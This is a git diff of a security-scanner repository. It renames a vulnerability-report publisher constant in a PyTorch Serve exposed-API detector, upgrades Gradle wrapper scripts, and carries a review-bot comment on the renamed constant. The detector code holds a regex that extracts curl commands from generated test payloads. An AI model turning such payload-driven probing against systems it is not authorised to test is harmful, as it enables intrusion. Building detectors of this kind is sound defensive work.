a/google/detectors/exposedui/pytorch_serve/src/main/java/com/google/tsunami/plugins/detectors/exposedui/pytorchserve/PytorchServeExposedApiDetector.java b/google/detectors/exposedui/pytorch_serve/src/main/java/com/google/tsunami/plugins/detectors/exposedui/pytorchserve/PytorchServeExposedApiDetector.java index 491cc18a3..ebb414e62 100644 --- a/google/detectors/exposedui/pytorch_serve/src/main/java/com/google/tsunami/plugins/detectors/exposedui/pytorchserve/PytorchServeExposedApiDetector.java +++ b/google/detectors/exposedui/pytorch_serve/src/main/java/com/google/tsunami/plugins/detectors/exposedui/pytorchserve/PytorchServeExposedApiDetector.java 
@@ -67,7 +67,7 @@ public final class PytorchServeExposedApiDetector implements VulnDetector { private final Clock utcClock; private final HttpClient httpClient; private final PayloadGenerator payloadGenerator; - @VisibleForTesting static final String VULNERABILITY_REPORT_PUBLISHER = "Google"; + @VisibleForTesting static final String VULNERABILITY_REPORT_PUBLISHER = "GOOGLE"; @VisibleForTesting static final String VULNERABILITY_REPORT_ID = "PYTORCH_EXPOSED_UI"; private static final Pattern URI_REGEX = Pattern.compile("curl (.*)"); diff --git a/google/detectors/exposedui/spring/gradle/wrapper/gradle-wrapper.jar b/google/detectors/exposedui/spring/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/exposedui/spring/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/exposedui/spring/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/exposedui/spring/gradle/wrapper/gradle-wrapper.properties b/google/detectors/exposedui/spring/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/exposedui/spring/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/exposedui/spring/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/exposedui/spring/gradlew b/google/detectors/exposedui/spring/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/exposedui/spring/gradlew +++ b/google/detectors/exposedui/spring/gradlew 
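Review bot: The new value of `VULNERABILITY_REPORT_PUBLISHER` changes a string that presumably becomes part of the reported finding's identifier together with `VULNERABILITY_REPORT_ID`, and nothing at the constant says which spelling is canonical. If findings are de-duplicated or suppressed downstream by publisher string, entries recorded under `"Google"` would stop matching after this change, so that is worth confirming before merge. I would add a comment above the constant such as `// Part of the reported finding's identity; keep the spelling stable.` The class body that uses the constant lies outside the hunk.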
@@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/exposedui/spring/gradlew.bat b/google/detectors/exposedui/spring/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/exposedui/spring/gradlew.bat +++ b/google/detectors/exposedui/spring/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/exposedui/wordpress/gradle/wrapper/gradle-wrapper.jar b/google/detectors/exposedui/wordpress/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/exposedui/wordpress/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/exposedui/wordpress/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/exposedui/wordpress/gradle/wrapper/gradle-wrapper.properties b/google/detectors/exposedui/wordpress/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/exposedui/wordpress/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/exposedui/wordpress/gradle/wrapper/gradle-wrapper.properties 
@@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/exposedui/wordpress/gradlew b/google/detectors/exposedui/wordpress/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/exposedui/wordpress/gradlew +++ b/google/detectors/exposedui/wordpress/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/exposedui/wordpress/gradlew.bat b/google/detectors/exposedui/wordpress/gradlew.bat old mode 100755 new mode 100644 index 5093609d5..93e3f59f1 --- a/google/detectors/exposedui/wordpress/gradlew.bat +++ b/google/detectors/exposedui/wordpress/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
